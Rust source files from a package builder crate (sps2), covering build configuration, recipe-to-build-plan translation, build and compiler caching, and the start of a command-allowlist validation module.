    // --- Command/shell validation (delegates to BuilderConfig) ---
    /// Check if a command is allowed
    #[must_use]
    pub fn is_command_allowed(&self, command: &str) -> bool {
        self.config.is_command_allowed(command)
    }
    /// Check if a shell pattern is allowed
    #[must_use]
    pub fn is_shell_pattern_allowed(&self, pattern: &str) -> bool {
        self.config.is_shell_pattern_allowed(pattern)
    }
    /// Get all allowed commands
    #[must_use]
    pub fn get_allowed_commands(&self) -> Vec<String> {
        self.config.get_allowed_commands()
    }
    /// Validate the configuration
    ///
    /// # Errors
    ///
    /// Returns an error if any configuration values are invalid
    pub fn validate(&self) -> Result<(), sps2_errors::Error> {
        self.config.validate()
    }
    /// Get access to `sps2_config` (for compatibility)
    #[must_use]
    pub fn sps2_config(&self) -> Option<&sps2_config::Config> {
        self.sps2_config.as_ref()
    }
    // Builder pattern methods for backward compatibility
    /// Create config with network access enabled (deprecated - network comes from recipe)
    ///
    /// NOTE(review): this does NOT enable anything — it simply returns a
    /// default config; kept only so old call sites still compile.
    #[must_use]
    pub fn with_network() -> Self {
        // Network access should come from recipe, not config
        Self::default()
    }
    /// Set SBOM configuration
    #[must_use]
    pub fn with_sbom_config(mut self, sbom_config: SbomSettings) -> Self {
        self.config.packaging.sbom = sbom_config;
        self
    }
    /// Set signing configuration
    #[must_use]
    pub fn with_signing_config(mut self, signing_config: SigningSettings) -> Self {
        self.config.packaging.signing = signing_config;
        self
    }
    /// Set build timeout
    #[must_use]
    pub fn with_timeout(mut self, seconds: u64) -> Self {
        self.config.build.timeout_seconds = seconds;
        self
    }
    /// Set parallel build jobs
    #[must_use]
    pub fn with_jobs(mut self, jobs: usize) -> Self {
        self.config.build.build_jobs = jobs;
        self
    }
    /// Set build root directory
    #[must_use]
    pub fn with_build_root(mut self, path: std::path::PathBuf) -> Self {
        self.config.build.build_root = path;
        self
    }
    /// Set isolation level (deprecated - isolation comes from recipe)
    ///
    /// The `_level` argument is intentionally ignored; `self` is returned
    /// unchanged.
    #[must_use]
    pub fn with_isolation_level(self, _level: &str) -> Self {
        // Isolation level should come from recipe, not config
        self
    }
}
impl Default for BuildConfig {
fn default() -> Self {
Self::new(BuilderConfig::default())
}
}
impl From<BuilderConfig> for BuildConfig {
fn from(config: BuilderConfig) -> Self {
Self::new(config)
}
}
// Re-export commonly used types for convenience
pub use sps2_config::builder::{
BuildSystemSettings, CommandsConfig, ShellExpansionPolicy as ConfigShellExpansionPolicy,
ValidationMode as ConfigValidationMode,
};
#[cfg(test)]
mod tests {
    use super::*;
    // Defaults: 3600s timeout, strict validation, shell expansion disabled.
    #[test]
    fn test_build_config_creation() {
        let builder_config = BuilderConfig::default();
        let build_config = BuildConfig::new(builder_config);
        assert_eq!(build_config.max_build_time(), Some(3600));
        assert!(build_config.is_strict_validation());
        assert!(!build_config.allow_shell_expansion());
    }
    // The default configuration must pass its own validation.
    #[test]
    fn test_build_config_validation() {
        let build_config = BuildConfig::default();
        assert!(build_config.validate().is_ok());
    }
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/builder/src/lib.rs | crates/builder/src/lib.rs | #![warn(mismatched_lifetime_syntaxes)]
#![deny(clippy::pedantic, unsafe_code)]
//! Package building for sps2
//!
//! This crate handles building packages from YAML recipes with
//! isolated environments, dependency management, and packaging.
pub mod artifact_qa;
mod build_plan;
mod build_systems;
mod cache;
pub mod config;
mod core;
mod environment;
mod packaging;
mod recipe;
mod security;
mod stages;
mod utils;
mod validation;
mod yaml;
pub use build_systems::{
detect_build_system, AutotoolsBuildSystem, BuildSystem, BuildSystemConfig, BuildSystemContext,
BuildSystemRegistry, CMakeBuildSystem, CargoBuildSystem, GoBuildSystem, MesonBuildSystem,
NodeJsBuildSystem, PythonBuildSystem, TestFailure, TestResults,
};
pub use cache::{
BuildCache, CacheStatistics, CompilerCache, CompilerCacheType, IncrementalBuildTracker,
SourceCache,
};
pub use config::BuildConfig;
pub use core::api::BuilderApi;
pub use core::builder::Builder;
pub use environment::{BuildCommandResult, BuildEnvironment, BuildResult};
pub use utils::format::{detect_compression_format, CompressionFormatInfo};
// Re-export packaging types
pub use packaging::archive::{create_deterministic_tar_archive, get_deterministic_timestamp};
pub use packaging::compression::compress_with_zstd;
// SBOM-related re-exports removed
// SBOM types removed from re-exports
pub use packaging::manifest::create_manifest;
pub use packaging::signing::PackageSigner;
pub use packaging::{create_and_sign_package, create_package};
// Re-export config types for backward compatibility
// Re-export YAML types (from yaml module)
pub use yaml::{BuildStep, RecipeMetadata};
// Re-export recipe types (from recipe module)
pub use recipe::model::{
Build, BuildSystem as YamlBuildSystem, ChecksumAlgorithm, ParsedStep, PostCommand, PostOption,
RpathPatchOption, SourceMethod, YamlRecipe,
};
pub use recipe::parser::parse_yaml_recipe;
pub use core::context::BuildContext;
// Re-export build plan and security types for pack command
pub use build_plan::BuildPlan;
pub use security::SecurityContext;
pub use stages::build::BuildCommand;
pub use stages::executors::execute_post_step_with_security;
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/builder/src/build_plan.rs | crates/builder/src/build_plan.rs | //! Build plan representation for staged execution
use crate::environment::IsolationLevel;
use crate::recipe::model::YamlRecipe;
use crate::stages::{BuildCommand, PostStep, SourceStep};
use crate::validation;
use crate::yaml::RecipeMetadata;
use sps2_errors::Error;
use sps2_types::RpathStyle;
use std::collections::HashMap;
use std::path::Path;
/// Collection of steps by stage type
///
/// Internal carrier used while translating a recipe into a `BuildPlan`.
struct StageSteps {
    // Source acquisition and patch steps
    source: Vec<SourceStep>,
    // Build-system invocations / build commands
    build: Vec<BuildCommand>,
    // Post-processing steps (permissions, rpaths, custom commands)
    post: Vec<PostStep>,
}
/// Complete build plan extracted from recipe
///
/// Produced by `BuildPlan::from_yaml`; holds the fully validated, staged
/// sequence of operations (source -> build -> post).
#[derive(Debug, Clone)]
pub struct BuildPlan {
    /// Package metadata
    pub metadata: RecipeMetadata,
    /// Environment configuration (extracted from recipe, applied before build)
    pub environment: EnvironmentConfig,
    /// Source operations (fetch, git, local, patches)
    pub source_steps: Vec<SourceStep>,
    /// Build operations (configure, make, etc.)
    pub build_steps: Vec<BuildCommand>,
    /// Post-processing operations
    pub post_steps: Vec<PostStep>,
    /// QA pipeline override
    pub qa_pipeline: sps2_types::QaPipelineOverride,
    /// Whether to automatically install after build
    pub auto_install: bool,
}
/// Environment configuration to apply before build
///
/// A direct copy of the recipe's `environment` section.
#[derive(Debug, Clone)]
pub struct EnvironmentConfig {
    /// Isolation level
    pub isolation: IsolationLevel,
    /// Whether to apply compiler defaults
    pub defaults: bool,
    /// Whether to allow network access
    pub network: bool,
    /// Environment variables to set
    pub variables: HashMap<String, String>,
}
impl BuildPlan {
    /// Create a build plan from a YAML recipe
    ///
    /// Copies environment and metadata 1:1 from the recipe, then extracts
    /// and validates the staged steps (source, build, post).
    ///
    /// # Errors
    ///
    /// Returns an error if validation fails for any build step
    pub fn from_yaml(
        recipe: &YamlRecipe,
        recipe_path: &Path,
        sps2_config: Option<&sps2_config::Config>,
    ) -> Result<Self, Error> {
        // Extract environment config
        let environment = EnvironmentConfig {
            isolation: recipe.environment.isolation,
            defaults: recipe.environment.defaults,
            network: recipe.environment.network,
            variables: recipe.environment.variables.clone(),
        };
        // Convert metadata
        let metadata = RecipeMetadata {
            name: recipe.metadata.name.clone(),
            version: recipe.metadata.version.clone(),
            description: recipe.metadata.description.clone().into(),
            homepage: recipe.metadata.homepage.clone(),
            license: Some(recipe.metadata.license.clone()),
            runtime_deps: recipe.metadata.dependencies.runtime.clone(),
            build_deps: recipe.metadata.dependencies.build.clone(),
        };
        // Extract steps by stage
        let stage_steps = Self::extract_steps_by_stage(recipe, recipe_path, sps2_config)?;
        Ok(Self {
            metadata,
            environment,
            source_steps: stage_steps.source,
            build_steps: stage_steps.build,
            post_steps: stage_steps.post,
            qa_pipeline: recipe.post.qa_pipeline,
            auto_install: recipe.install.auto,
        })
    }
    /// Extract build steps organized by stage
    ///
    /// Note that post-step extraction needs the build steps: the default
    /// rpath-patching policy depends on which build system is used.
    fn extract_steps_by_stage(
        recipe: &YamlRecipe,
        recipe_path: &Path,
        sps2_config: Option<&sps2_config::Config>,
    ) -> Result<StageSteps, Error> {
        let source_steps = Self::extract_source_steps(recipe, recipe_path)?;
        let build_steps = Self::extract_build_steps(recipe, sps2_config)?;
        let post_steps = Self::extract_post_steps(recipe, &build_steps, sps2_config)?;
        Ok(StageSteps {
            source: source_steps,
            build: build_steps,
            post: post_steps,
        })
    }
    /// Extract source steps from recipe
    ///
    /// A recipe has either a single `method` or a list of named `sources`
    /// (the branches below are mutually exclusive). Patches are always
    /// applied after all sources are acquired, and every resulting step is
    /// validated against the recipe directory.
    fn extract_source_steps(
        recipe: &YamlRecipe,
        recipe_path: &Path,
    ) -> Result<Vec<SourceStep>, Error> {
        let mut source_steps = Vec::new();
        // Source acquisition
        if let Some(method) = &recipe.source.method {
            Self::add_source_method_steps(&mut source_steps, method, None);
        } else {
            // Handle multi-source case
            for named_source in &recipe.source.sources {
                Self::add_source_method_steps(
                    &mut source_steps,
                    &named_source.method,
                    named_source.extract_to.clone(),
                );
            }
        }
        // Apply patches
        for patch in &recipe.source.patches {
            source_steps.push(SourceStep::ApplyPatch {
                path: patch.clone(),
            });
        }
        // Validate all source steps
        let recipe_dir = recipe_path.parent().unwrap_or(Path::new("."));
        for step in &source_steps {
            validation::validate_source_step(step, recipe_dir)?;
        }
        Ok(source_steps)
    }
    /// Add source method steps to the steps vector
    ///
    /// For fetch sources, the caller-supplied `extract_to` (from a named
    /// multi-source entry) takes precedence over the fetch block's own
    /// `extract_to`. The fetch variant chosen depends on which checksum
    /// algorithm (if any) the recipe declares.
    fn add_source_method_steps(
        source_steps: &mut Vec<SourceStep>,
        method: &crate::recipe::model::SourceMethod,
        extract_to: Option<String>,
    ) {
        use crate::recipe::model::{ChecksumAlgorithm, SourceMethod};
        match method {
            SourceMethod::Git { git } => {
                source_steps.push(SourceStep::Git {
                    url: git.url.clone(),
                    ref_: git.git_ref.clone(),
                });
            }
            SourceMethod::Fetch { fetch } => {
                let extract_to = extract_to.or_else(|| fetch.extract_to.clone());
                match &fetch.checksum {
                    Some(checksum) => match &checksum.algorithm {
                        ChecksumAlgorithm::Blake3 { blake3 } => {
                            source_steps.push(SourceStep::FetchBlake3 {
                                url: fetch.url.clone(),
                                blake3: blake3.clone(),
                                extract_to,
                            });
                        }
                        ChecksumAlgorithm::Sha256 { sha256 } => {
                            source_steps.push(SourceStep::FetchSha256 {
                                url: fetch.url.clone(),
                                sha256: sha256.clone(),
                                extract_to,
                            });
                        }
                        ChecksumAlgorithm::Md5 { md5 } => {
                            source_steps.push(SourceStep::FetchMd5 {
                                url: fetch.url.clone(),
                                md5: md5.clone(),
                                extract_to,
                            });
                        }
                    },
                    None => {
                        source_steps.push(SourceStep::Fetch {
                            url: fetch.url.clone(),
                            extract_to,
                        });
                    }
                }
            }
            SourceMethod::Local { local } => {
                source_steps.push(SourceStep::Copy {
                    src_path: Some(local.path.clone()),
                });
            }
        }
    }
    /// Extract build steps from recipe
    ///
    /// `Build::System` maps to exactly one build-system invocation with its
    /// arguments; `Build::Steps` validates each explicit step (against the
    /// sps2 command allow-list when a config is provided).
    fn extract_build_steps(
        recipe: &YamlRecipe,
        sps2_config: Option<&sps2_config::Config>,
    ) -> Result<Vec<BuildCommand>, Error> {
        use crate::recipe::model::Build;
        let mut build_steps = Vec::new();
        match &recipe.build {
            Build::System { system, args } => {
                let step = match system {
                    crate::recipe::model::BuildSystem::Autotools => {
                        BuildCommand::Autotools { args: args.clone() }
                    }
                    crate::recipe::model::BuildSystem::Cmake => {
                        BuildCommand::Cmake { args: args.clone() }
                    }
                    crate::recipe::model::BuildSystem::Meson => {
                        BuildCommand::Meson { args: args.clone() }
                    }
                    crate::recipe::model::BuildSystem::Cargo => {
                        BuildCommand::Cargo { args: args.clone() }
                    }
                    crate::recipe::model::BuildSystem::Go => {
                        BuildCommand::Go { args: args.clone() }
                    }
                    crate::recipe::model::BuildSystem::Python => {
                        BuildCommand::Python { args: args.clone() }
                    }
                    crate::recipe::model::BuildSystem::Nodejs => {
                        BuildCommand::NodeJs { args: args.clone() }
                    }
                    crate::recipe::model::BuildSystem::Make => {
                        BuildCommand::Make { args: args.clone() }
                    }
                };
                build_steps.push(step);
            }
            Build::Steps { steps } => {
                for step in steps {
                    // Validate and convert each step
                    let build_step = validation::validate_build_step(step, sps2_config)?;
                    build_steps.push(build_step);
                }
            }
        }
        Ok(build_steps)
    }
    /// Extract post-processing steps from recipe
    ///
    /// `build_steps` is consulted only for the default rpath policy: C/C++
    /// style build systems default to modern rpath patching, everything else
    /// skips it unless the recipe says otherwise.
    fn extract_post_steps(
        recipe: &YamlRecipe,
        build_steps: &[BuildCommand],
        sps2_config: Option<&sps2_config::Config>,
    ) -> Result<Vec<PostStep>, Error> {
        use crate::recipe::model::{PostOption, RpathPatchOption};
        let mut post_steps = Vec::new();
        // Fix permissions
        match &recipe.post.fix_permissions {
            PostOption::Enabled(true) => {
                post_steps.push(PostStep::FixPermissions {
                    paths: vec![], // Will use default paths
                });
            }
            PostOption::Paths(paths) => {
                post_steps.push(PostStep::FixPermissions {
                    paths: paths.clone(),
                });
            }
            PostOption::Enabled(false) => {}
        }
        // Patch rpaths
        match &recipe.post.patch_rpaths {
            RpathPatchOption::Default => {
                // Default behavior depends on the build system
                let is_c_build_system = build_steps.iter().any(|step| {
                    matches!(
                        step,
                        BuildCommand::Autotools { .. }
                            | BuildCommand::Cmake { .. }
                            | BuildCommand::Make { .. }
                            | BuildCommand::Configure { .. }
                    )
                });
                if is_c_build_system {
                    // For C/C++ projects, default to modern rpath patching
                    post_steps.push(PostStep::PatchRpaths {
                        style: RpathStyle::Modern,
                        paths: vec![], // Will use default paths
                    });
                } else {
                    // For Rust, Go, etc., skip rpath patching by default
                }
            }
            RpathPatchOption::Absolute => {
                // Absolute: Convert @rpath to absolute paths
                post_steps.push(PostStep::PatchRpaths {
                    style: RpathStyle::Absolute,
                    paths: vec![], // Will use default paths
                });
            }
            RpathPatchOption::Skip => {
                // Skip: No rpath patching
            }
        }
        // Custom post-processing commands
        for command in &recipe.post.commands {
            // Validate and convert each command
            let post_step = validation::validate_post_command(command, sps2_config)?;
            post_steps.push(post_step);
        }
        Ok(post_steps)
    }
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/builder/src/cache.rs | crates/builder/src/cache.rs | // Crate-level pedantic settings apply
//! Caching and incremental builds system
//!
//! This module provides build caching, artifact storage, and incremental build tracking
//! to speed up repeated builds and avoid unnecessary recompilation.
use sps2_errors::Error;
use sps2_events::{AppEvent, BuildDiagnostic, BuildEvent, EventEmitter, EventSender};
use std::collections::HashMap;
use std::path::{Path, PathBuf};
use std::sync::Arc;
use std::time::SystemTime;
use tokio::fs;
use tokio::sync::RwLock;
/// Build cache for compiler caching and source downloads
///
/// Cloning is cheap: the sub-caches and statistics live behind `Arc`s, so
/// all clones observe the same shared state.
#[derive(Debug, Clone)]
pub struct BuildCache {
    /// Root directory under which all cache data lives
    cache_root: PathBuf,
    /// Download / git-repo location cache (directory `<root>/sources`)
    source_cache: Arc<SourceCache>,
    /// ccache/sccache integration (directory `<root>/compiler`)
    compiler_cache: Arc<CompilerCache>,
    /// Shared hit/miss/eviction counters
    stats: Arc<RwLock<CacheStatistics>>,
    /// Optional channel for emitting cache-related events
    event_sender: Option<sps2_events::EventSender>,
}
impl EventEmitter for BuildCache {
    /// Expose the optional event channel so `emit` (used e.g. by
    /// `clear_all`) can publish cache diagnostics.
    fn event_sender(&self) -> Option<&EventSender> {
        self.event_sender.as_ref()
    }
}
impl BuildCache {
    /// Create a new build cache
    ///
    /// Creates `cache_root` (and the `sources`/`compiler` subdirectories via
    /// the sub-cache constructors) if they do not exist yet.
    ///
    /// # Errors
    ///
    /// Returns an error if:
    /// - Failed to create the cache directory
    /// - Failed to initialize the source or compiler caches
    pub async fn new(
        cache_root: PathBuf,
        event_sender: Option<EventSender>,
    ) -> Result<Self, Error> {
        fs::create_dir_all(&cache_root).await?;
        let source_cache = Arc::new(SourceCache::new(cache_root.join("sources")).await?);
        let compiler_cache = Arc::new(CompilerCache::new(cache_root.join("compiler")).await?);
        let stats = Arc::new(RwLock::new(CacheStatistics::default()));
        Ok(Self {
            cache_root,
            source_cache,
            compiler_cache,
            stats,
            event_sender,
        })
    }
    /// Get a snapshot (clone) of the current cache statistics
    pub async fn get_statistics(&self) -> CacheStatistics {
        self.stats.read().await.clone()
    }
    /// Get the cache root directory
    #[must_use]
    pub fn cache_root(&self) -> &Path {
        &self.cache_root
    }
    /// Get the compiler cache instance
    #[must_use]
    pub fn compiler_cache(&self) -> &CompilerCache {
        &self.compiler_cache
    }
    /// Get the source cache instance
    #[must_use]
    pub fn source_cache(&self) -> &SourceCache {
        &self.source_cache
    }
    /// Clear the in-memory source cache and reset statistics
    ///
    /// NOTE(review): despite the name, this does not touch the compiler
    /// cache or remove any files on disk, and the emitted `CachePruned`
    /// event always reports zero items/bytes — confirm whether real
    /// accounting is intended here.
    ///
    /// # Errors
    ///
    /// Currently infallible — always returns `Ok`. The `Result` is kept for
    /// future cleanup work that may actually fail.
    pub async fn clear_all(&self) -> Result<(), Error> {
        self.source_cache.clear().await;
        // Reset statistics
        let mut stats = self.stats.write().await;
        *stats = CacheStatistics::default();
        self.emit(AppEvent::Build(BuildEvent::Diagnostic(
            BuildDiagnostic::CachePruned {
                removed_items: 0,
                freed_bytes: 0,
            },
        )));
        Ok(())
    }
}
/// Simple source cache for downloads and git repositories
///
/// Purely in-memory: it maps URLs to paths already on disk and does not
/// itself copy, verify, or delete any files.
#[derive(Debug)]
pub struct SourceCache {
    #[allow(dead_code)] // Stored for potential future cache operations
    cache_dir: PathBuf,
    /// URL -> local path of a completed download
    downloads: RwLock<HashMap<String, PathBuf>>,
    /// URL -> local path of a cloned repository
    git_repos: RwLock<HashMap<String, PathBuf>>,
}
impl SourceCache {
    /// Create new source cache
    ///
    /// # Errors
    ///
    /// Returns an error if the cache directory cannot be created.
    pub async fn new(cache_dir: PathBuf) -> Result<Self, Error> {
        fs::create_dir_all(&cache_dir).await?;
        let downloads = RwLock::new(HashMap::new());
        let git_repos = RwLock::new(HashMap::new());
        Ok(Self {
            cache_dir,
            downloads,
            git_repos,
        })
    }
    /// Record the on-disk location of a downloaded file.
    pub async fn cache_download(&self, url: String, path: PathBuf) {
        self.downloads.write().await.insert(url, path);
    }
    /// Look up a previously cached download by URL.
    pub async fn get_download(&self, url: &str) -> Option<PathBuf> {
        self.downloads.read().await.get(url).cloned()
    }
    /// Record the on-disk location of a cloned git repository.
    pub async fn cache_git_repo(&self, url: String, path: PathBuf) {
        self.git_repos.write().await.insert(url, path);
    }
    /// Look up a previously cached git repository by URL.
    pub async fn get_git_repo(&self, url: &str) -> Option<PathBuf> {
        self.git_repos.read().await.get(url).cloned()
    }
    /// Clear all cached entries (both maps are cleared while both write
    /// locks are held, so no reader sees a half-cleared cache).
    pub async fn clear(&self) {
        let mut downloads_guard = self.downloads.write().await;
        let mut repos_guard = self.git_repos.write().await;
        downloads_guard.clear();
        repos_guard.clear();
    }
}
/// Compiler cache integration
///
/// Wraps an external ccache/sccache installation detected at construction
/// time; when neither tool is on `PATH` the cache is a no-op.
#[derive(Debug)]
pub struct CompilerCache {
    /// Which external cache tool was detected (or `None`)
    cache_type: CompilerCacheType,
    /// Directory handed to the cache tool via environment variables
    cache_dir: PathBuf,
    /// Size limit in bytes passed to the tool (5 GiB by default)
    max_size: u64,
}
/// Type of compiler cache detected on the system
#[derive(Debug, Clone, Copy)]
pub enum CompilerCacheType {
    /// ccache (C/C++ compiler cache)
    CCache,
    /// sccache (also wraps rustc via `RUSTC_WRAPPER`)
    SCCache,
    /// No cache tool available; caching is disabled
    None,
}
impl CompilerCache {
    /// Create the compiler cache, auto-detecting an available wrapper.
    ///
    /// Detection prefers `sccache` over `ccache`; when neither binary is on
    /// `PATH` the cache is disabled.
    async fn new(cache_dir: PathBuf) -> Result<Self, Error> {
        fs::create_dir_all(&cache_dir).await?;
        let cache_type = if which::which("sccache").is_ok() {
            CompilerCacheType::SCCache
        } else if which::which("ccache").is_ok() {
            CompilerCacheType::CCache
        } else {
            CompilerCacheType::None
        };
        let max_size = 5 * 1024 * 1024 * 1024; // 5GB default
        Ok(Self {
            cache_type,
            cache_dir,
            max_size,
        })
    }
    /// Get environment variables for compiler cache
    ///
    /// Returns environment variables that should be set for the compiler cache to work.
    /// These variables configure cache directories and size limits.
    #[must_use]
    pub fn get_env_vars(&self) -> HashMap<String, String> {
        let dir = self.cache_dir.display().to_string();
        let size_limit = format!("{}G", self.max_size / (1024 * 1024 * 1024));
        let mut vars = HashMap::new();
        match self.cache_type {
            CompilerCacheType::CCache => {
                vars.insert("CCACHE_DIR".to_string(), dir);
                vars.insert("CCACHE_MAXSIZE".to_string(), size_limit);
            }
            CompilerCacheType::SCCache => {
                vars.insert("SCCACHE_DIR".to_string(), dir);
                vars.insert("SCCACHE_CACHE_SIZE".to_string(), size_limit);
                vars.insert("RUSTC_WRAPPER".to_string(), "sccache".to_string());
            }
            CompilerCacheType::None => {}
        }
        vars
    }
    /// Get wrapper command for compiler
    ///
    /// Returns the wrapper command (ccache or sccache) if a compiler cache is enabled.
    /// This should be prepended to compiler invocations.
    #[must_use]
    pub fn get_wrapper(&self) -> Option<&'static str> {
        match self.cache_type {
            CompilerCacheType::SCCache => Some("sccache"),
            CompilerCacheType::CCache => Some("ccache"),
            CompilerCacheType::None => None,
        }
    }
}
/// Incremental build tracking
///
/// NOTE(review): `file_mtimes` and `dep_graph` are populated by the tracking
/// methods, but `get_files_to_rebuild` only returns the list built via
/// `mark_changed` — the dependency graph is never consulted here; confirm
/// whether propagation through the graph is still planned.
#[derive(Debug)]
pub struct IncrementalBuildTracker {
    /// File modification times (recorded by `track_file`)
    file_mtimes: RwLock<HashMap<PathBuf, SystemTime>>,
    /// Dependency graph (target -> direct dependencies)
    dep_graph: RwLock<HashMap<PathBuf, Vec<PathBuf>>>,
    /// Files explicitly marked as changed (deduplicated)
    changed_files: RwLock<Vec<PathBuf>>,
}
impl IncrementalBuildTracker {
    /// Create new incremental build tracker
    ///
    /// The tracker must be used to monitor file changes and determine if rebuilds are needed.
    #[must_use]
    pub fn new() -> Self {
        Self {
            file_mtimes: RwLock::new(HashMap::new()),
            dep_graph: RwLock::new(HashMap::new()),
            changed_files: RwLock::new(Vec::new()),
        }
    }
    /// Record the current modification time of `path`.
    ///
    /// Files whose metadata or mtime cannot be read are silently skipped
    /// (they simply remain untracked).
    ///
    /// # Errors
    ///
    /// Currently infallible — always returns `Ok`; metadata failures are
    /// swallowed. The `Result` is kept so the signature can gain real error
    /// reporting later.
    pub async fn track_file(&self, path: &Path) -> Result<(), Error> {
        if let Ok(metadata) = fs::metadata(path).await {
            if let Ok(mtime) = metadata.modified() {
                let mut mtimes = self.file_mtimes.write().await;
                mtimes.insert(path.to_path_buf(), mtime);
            }
        }
        Ok(())
    }
    /// Check if file has changed since it was last tracked
    ///
    /// Untracked files, or files whose current mtime cannot be read, are
    /// conservatively reported as changed.
    ///
    /// # Errors
    ///
    /// Currently infallible — always returns `Ok`; lookup/metadata failures
    /// fall through to the `Ok(true)` (assume-changed) path.
    pub async fn has_file_changed(&self, path: &Path) -> Result<bool, Error> {
        let mtimes = self.file_mtimes.read().await;
        if let Some(&stored_mtime) = mtimes.get(path) {
            if let Ok(metadata) = fs::metadata(path).await {
                if let Ok(current_mtime) = metadata.modified() {
                    return Ok(current_mtime > stored_mtime);
                }
            }
        }
        // If we can't determine, assume it changed
        Ok(true)
    }
    /// Add dependency relationship (target depends on dependency)
    pub async fn add_dependency(&self, target: PathBuf, dependency: PathBuf) {
        let mut graph = self.dep_graph.write().await;
        graph.entry(target).or_default().push(dependency);
    }
    /// Get files that need rebuilding
    ///
    /// Returns a copy of the explicitly marked-changed list (see the struct
    /// note: the dependency graph is not consulted).
    pub async fn get_files_to_rebuild(&self) -> Vec<PathBuf> {
        self.changed_files.read().await.clone()
    }
    /// Mark file as changed (no-op if it is already in the list)
    pub async fn mark_changed(&self, path: PathBuf) {
        let mut changed = self.changed_files.write().await;
        if !changed.contains(&path) {
            changed.push(path);
        }
    }
    /// Clear changed files after build
    pub async fn clear_changed_files(&self) {
        self.changed_files.write().await.clear();
    }
}
impl Default for IncrementalBuildTracker {
fn default() -> Self {
Self::new()
}
}
/// Cache statistics
///
/// Plain counters aggregated by the build cache; see
/// [`CacheStatistics::hit_rate`] for the derived hit percentage.
#[derive(Debug, Clone, Default)]
pub struct CacheStatistics {
    /// Number of cache hits
    pub cache_hits: u64,
    /// Number of cache misses
    pub cache_misses: u64,
    /// Number of artifacts cached
    pub artifacts_cached: u64,
    /// Number of evictions
    pub evictions: u64,
}
impl CacheStatistics {
    /// Percentage of lookups served from the cache, in `0.0..=100.0`.
    ///
    /// Returns `0.0` when no lookups have been recorded yet.
    #[must_use]
    #[allow(clippy::cast_precision_loss)] // Acceptable for percentage calculation
    pub fn hit_rate(&self) -> f64 {
        let total = self.cache_hits + self.cache_misses;
        if total == 0 {
            return 0.0;
        }
        (self.cache_hits as f64 / total as f64) * 100.0
    }
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/builder/src/validation/command.rs | crates/builder/src/validation/command.rs | //! Command parsing and validation
//!
//! This module provides secure command parsing and validation to prevent
//! execution of dangerous commands during the build process.
use super::rules::{DANGEROUS_PATTERNS, SYSTEM_PATHS};
use sps2_errors::{BuildError, Error};
/// Parsed and validated command
///
/// Result of [`parse_and_validate_command`]: the program plus its arguments,
/// all of which have passed this module's security checks.
#[derive(Debug, Clone)]
pub struct ValidatedCommand {
    /// Program name (first whitespace-separated token of the command line)
    pub program: String,
    /// Remaining whitespace-separated tokens, in order
    pub args: Vec<String>,
}
/// Parse and validate a simple command string
///
/// Splits `command` on whitespace into program + arguments, then rejects
/// anything failing the security checks (allowlist, dangerous flags,
/// system-path references, injection attempts).
///
/// # Errors
///
/// Returns a `BuildError` for empty input or any failed validation.
pub fn parse_and_validate_command(
    command: &str,
    sps2_config: Option<&sps2_config::Config>,
) -> Result<ValidatedCommand, Error> {
    let command = command.trim();
    if command.is_empty() {
        return Err(BuildError::CommandParseError {
            command: command.to_string(),
            reason: "Empty command".to_string(),
        }
        .into());
    }
    let mut pieces = command.split_whitespace();
    // Defensive: a non-empty trimmed string always yields a first token.
    let Some(program) = pieces.next() else {
        return Err(BuildError::CommandParseError {
            command: command.to_string(),
            reason: "No command specified".to_string(),
        }
        .into());
    };
    let args: Vec<String> = pieces.map(str::to_string).collect();
    validate_program(program, command, sps2_config)?;
    // rsync gets extra scrutiny for remote endpoints.
    if program == "rsync" {
        validate_rsync_command(&args, command)?;
    }
    for arg in &args {
        validate_argument(arg, command)?;
    }
    Ok(ValidatedCommand {
        program: program.to_string(),
        args,
    })
}
/// Validate a shell command (executed with `sh -c`)
///
/// Tokenizes the script and validates every command in it, then performs a
/// belt-and-braces substring scan for known dangerous patterns that may slip
/// through tokenization.
///
/// # Errors
///
/// Returns a `BuildError` when token validation fails or a dangerous
/// pattern is present.
pub fn validate_shell_command(
    shell: &str,
    sps2_config: Option<&sps2_config::Config>,
) -> Result<(), Error> {
    let tokens = super::parser::tokenize_shell(shell);
    super::parser::validate_tokens(&tokens, sps2_config)?;
    for pattern in DANGEROUS_PATTERNS {
        if !shell.contains(pattern) {
            continue;
        }
        return Err(BuildError::DangerousCommand {
            command: shell.to_string(),
            reason: format!("Shell command contains dangerous pattern: {pattern}"),
        }
        .into());
    }
    Ok(())
}
/// Validate a program name against the allowlist and hard-coded safety rules.
///
/// Check order matters for error precedence: allowlist first, then `rm`
/// scrutiny, privilege escalation, and finally path traversal.
///
/// # Errors
///
/// Returns a `BuildError` when the program is not allowed or looks dangerous.
fn validate_program(
    program: &str,
    full_command: &str,
    sps2_config: Option<&sps2_config::Config>,
) -> Result<(), Error> {
    // Strict allowlist: with no config there is nothing to validate against.
    let Some(config) = sps2_config else {
        return Err(BuildError::DangerousCommand {
            command: full_command.to_string(),
            reason: "No configuration provided - cannot validate allowed commands".to_string(),
        }
        .into());
    };
    if !config.is_command_allowed(program) {
        return Err(BuildError::DangerousCommand {
            command: full_command.to_string(),
            reason: format!("Command '{program}' is not in the allowed commands list"),
        }
        .into());
    }
    // rm gets additional flag/target inspection.
    if program == "rm" {
        validate_rm_command(full_command)?;
    }
    // Defence in depth: these should already be disallowed by config.
    if matches!(program, "sudo" | "doas" | "su") {
        return Err(BuildError::DangerousCommand {
            command: full_command.to_string(),
            reason: "Privilege escalation commands are not allowed".to_string(),
        }
        .into());
    }
    if program.contains("..") {
        return Err(BuildError::InvalidPath {
            path: program.to_string(),
            reason: "Path traversal in command name is not allowed".to_string(),
        }
        .into());
    }
    Ok(())
}
/// Validate a single command argument for system-path and injection abuse.
///
/// # Errors
///
/// Returns a `BuildError` when the argument references a protected system
